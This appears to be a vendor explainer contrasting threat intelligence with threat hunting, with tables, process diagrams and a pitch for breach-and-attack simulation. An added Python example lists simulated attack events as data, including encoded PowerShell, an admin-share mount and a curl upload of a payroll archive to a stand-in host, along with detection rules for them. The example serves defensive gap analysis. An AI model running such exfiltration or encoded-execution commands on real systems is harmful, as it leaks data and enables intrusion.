Threat Intelligence vs Threat Hunting
Threat intelligence and threat hunting are two complementary disciplines in modern security operations. While they are often conflated, they serve distinct purposes and require different approaches.
What is Threat Intelligence?
Threat intelligence (TI) is the collection, analysis, and dissemination of information about current and emerging threats to an organisation. It provides context about adversaries, their motivations, capabilities, and the tactics, techniques, and procedures (TTPs) they employ.
What is Threat Hunting?
Threat hunting is the proactive, hypothesis-driven search for threats that have evaded existing security controls. Hunters actively look for indicators of compromise (IoCs), anomalous behaviour, and adversary presence that automated tools have not detected.
Comparison Table
| Aspect | Threat Intelligence | Threat Hunting |
|---|---|---|
| Primary Goal | Provide context about threats | Find hidden threats in the environment |
| Approach | Collection and analysis of external data | Proactive, hypothesis-driven investigation |
| Data Sources | Open-source feeds, dark web, vendor reports, ISACs | Internal telemetry, logs, endpoint data, network traffic |
| Focus | What threats exist and who is behind them | Whether specific threats are present in your environment |
| Output | IoCs, threat reports, actor profiles, risk assessments | Findings, detection gaps, new detection rules |
| Skillset | Analysis, research, language skills, geopolitics | Deep technical expertise, OSINT, reverse engineering |
| Timeframe | Ongoing collection and analysis | Time-bounded investigations |
| Trigger | New threat intel, vulnerability disclosure, industry alert | Hypothesis, anomaly, intel lead, scheduled rotation |
| Automation Level | High (feeds, enrichment, correlation) | Low to moderate (analysis-driven) |
| Measurement | Relevance, timeliness, accuracy of intel | Threats found, detection gaps identified, dwell time reduced |
| MITRE ATT&CK Usage | Maps threats to techniques for context | Uses techniques to guide search hypotheses |
The Threat Intelligence Lifecycle
┌──────────────────────────────────────────────────────┐
│            Threat Intelligence Lifecycle             │
│                                                      │
│  Planning ──→ Collection ──→ Processing ──→ Analysis │
│     ↑                                           │    │
│     │                                           ↓    │
│     └────────────── Dissemination ◄─────────────┘    │
│                           │                          │
│                           ↓                          │
│                 Feedback & Refinement                │
└──────────────────────────────────────────────────────┘
Key Activities:
- Monitoring threat feeds and advisories
- Tracking adversary groups and campaigns
- Analysing malware samples and attack patterns
- Mapping threats to MITRE ATT&CK techniques
- Providing actionable intelligence to defenders
The Threat Hunting Process
┌──────────────────────────────────────────────────────┐
│                Threat Hunting Process                │
│                                                      │
│  Hypothesis ──→ Data Collection ──→ Analysis         │
│      ↑                                  │            │
│      │                                  ↓            │
│      └────── Refinement ◄── Findings & TTPs          │
│                                    │                 │
│                                    ↓                 │
│                         New Detections & Rules       │
└──────────────────────────────────────────────────────┘
Key Activities:
- Developing hypotheses based on threat intelligence
- Searching for indicators of compromise
- Analysing anomalous behaviour patterns
- Validating detection rule effectiveness
- Building new detections based on findings
How They Work Together
| Stage | Threat Intelligence Role | Threat Hunting Role |
|---|---|---|
| Preparation | Provides adversary profiles and TTPs | Develops hunting hypotheses |
| Collection | Gathers external threat data | Collects internal telemetry |
| Analysis | Correlates threats across campaigns | Searches for specific indicators |
| Detection | Informs detection rule creation | Validates detection effectiveness |
| Response | Provides attribution and context | Confirms threat presence and scope |
| Improvement | Updates threat models | Refines detections and hunting playbooks |
Common Use Cases
Threat Intelligence Use Cases
- Adversary profiling: Understanding which threat actors target your industry
- Vulnerability prioritisation: Using threat context to prioritise patches
- Risk assessment: Quantifying threat exposure for business decisions
- Incident response support: Providing attribution and TTP context during incidents
- Strategic planning: Informing security investment decisions
Threat Hunting Use Cases
- Hidden threat detection: Finding adversaries that bypassed automated defences
- Detection gap discovery: Identifying blind spots in security monitoring
- Lateral movement detection: Hunting for internal network compromise
- Data exfiltration hunting: Searching for unauthorised data transfers
- Insider threat detection: Identifying suspicious internal activity
The Role of BAS in Both Disciplines
Breach and Attack Simulation (BAS) bridges threat intelligence and threat hunting as follows:
| Discipline | How BAS Helps |
|---|---|
| Threat Intelligence | Validates whether intelligence-mapped TTPs would be detected in your environment |
| Threat Hunting | Provides hunting hypotheses by simulating attack techniques and testing if they leave detectable traces |
BAS-Enhanced Workflow
- Threat Intelligence identifies a new adversary TTP
- BAS simulates the TTP in your environment
- Results show whether existing detections catch the technique
- Threat Hunters investigate any detection gaps
- New detections are built and validated with BAS retesting
This creates a continuous improvement cycle that operationalises threat intelligence through automated validation and targeted hunting.
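The five workflow steps above, together with the hunting activities of validating detection rules and building new ones, scripted as an added example (not FourCore's code or the page's own). The BAS run, hostnames, command lines and rule names are constructed for illustration; the ATT&CK technique IDs are from the public matrix.

```python
from dataclasses import dataclass
from typing import Callable

# Constructed results of a BAS run: each simulated ATT&CK technique and the
# endpoint event it produced. Hosts and command lines are made up here.
BAS_RUN = [
    {"technique": "T1059.001", "host": "ws-17", "proc": "powershell.exe",
     "cmdline": "powershell.exe -nop -enc <base64>"},
    {"technique": "T1021.002", "host": "ws-17", "proc": "net.exe",
     "cmdline": "net use \\\\srv-fs01\\ADMIN$"},
    {"technique": "T1048", "host": "srv-fs01", "proc": "curl.exe",
     "cmdline": "curl -T payroll.zip https://example.invalid/up"},
]
# Step 1: TTPs handed over by threat intelligence for a hypothetical campaign.
# T1566.001 is in the intel but was not simulated in this run.
INTEL_TTPS = {"T1059.001", "T1021.002", "T1048", "T1566.001"}

@dataclass
class Rule:
    name: str
    technique: str                  # ATT&CK technique the rule is meant to cover
    match: Callable[[dict], bool]   # predicate over one endpoint event

# Existing detection content. Note that nothing covers T1048 yet.
RULES = [
    Rule("Encoded PowerShell", "T1059.001",
         lambda e: e["proc"] == "powershell.exe" and "-enc" in e["cmdline"].lower()),
    Rule("Admin share mount", "T1021.002",
         lambda e: e["proc"] == "net.exe" and "admin$" in e["cmdline"].lower()),
]

def hunt(ttps, events, rules):
    """Steps 2-3: for each intel TTP, count simulated events and list rules that fired."""
    report = {}
    for ttp in sorted(ttps):
        hits = [e for e in events if e["technique"] == ttp]
        fired = sorted(r.name for r in rules
                       if r.technique == ttp and any(r.match(e) for e in hits))
        report[ttp] = (len(hits), fired)
    return report

def detection_gaps(report):
    """Step 4: techniques that were executed but no rule caught. A TTP with zero
    events (T1566.001) is untested coverage, not a confirmed gap."""
    return sorted(t for t, (n, fired) in report.items() if n and not fired)

# Step 5: hunters write a rule for the gap, then retest against the same run.
NEW_RULE = Rule("Upload via curl", "T1048",
                lambda e: e["proc"] == "curl.exe" and " -t " in f" {e['cmdline'].lower()} ")
```

`detection_gaps(hunt(INTEL_TTPS, BAS_RUN, RULES))` reports `['T1048']`; rerunning with `RULES + [NEW_RULE]` closes the gap, while T1566.001 stays flagged as untested rather than covered.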
FourCore ATTACK enables organisations to operationalise threat intelligence by automatically simulating adversary TTPs and validating detection capabilities, providing actionable hunting hypotheses and measurable security posture improvements.